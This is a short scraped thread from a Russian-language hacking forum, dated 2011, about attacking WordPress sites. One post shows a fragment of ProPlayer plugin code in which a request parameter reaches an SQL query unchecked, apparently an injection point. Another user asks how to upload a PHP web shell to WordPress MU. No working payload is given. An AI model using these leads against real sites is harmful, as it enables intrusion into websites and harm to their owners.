05.08.2011, 05:34
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
Сообщение от Moriarty
Moriarty said:
Kuteke, вы вкурсе, что в таблицах вордпреса нет полей указывающий на админов ресурса?! Выложите хотя бы регулярку, чтобы понять какого на угад юзера выдает ваш код...
https://rdot.org/forum/showpost.php?p=2620&postcount=10
|
|
|

06.08.2011, 10:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 9121
Репутация:
1
|
|
[COLOR="DarkGreen"][B][SIZE="2"]ProPlayer plugin tablePrefix."proplayer_playlist WHERE (POST_ID='$id')");
$playlistRow = mysql_fetch_row($query);
return $this->withBackwardCompatibility($playlistRow[2]);
}
...
if (!empty($_GET["pp_playlist_id"])) {
header("Content-type: application/xml");
$xml = $playlistController->getPlaylist($_GET["pp_playlist_id"]);
[/CODE]
|
|
|
|

06.08.2011, 17:03
|
|
Guest
Сообщений: n/a
Провел на форуме: 3807
Репутация:
0
|
|
Подскажите по заливке шелла в WordPress MU 2.9.1.1, там можно заливать в аттачментах к постам php, php4 файлы(добавил типы файлов в доверенные) - но они не выполняются а просто показывает код.
Редактировать темы тоже почему-то не могу - нету такого раздела в Appearance.a
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|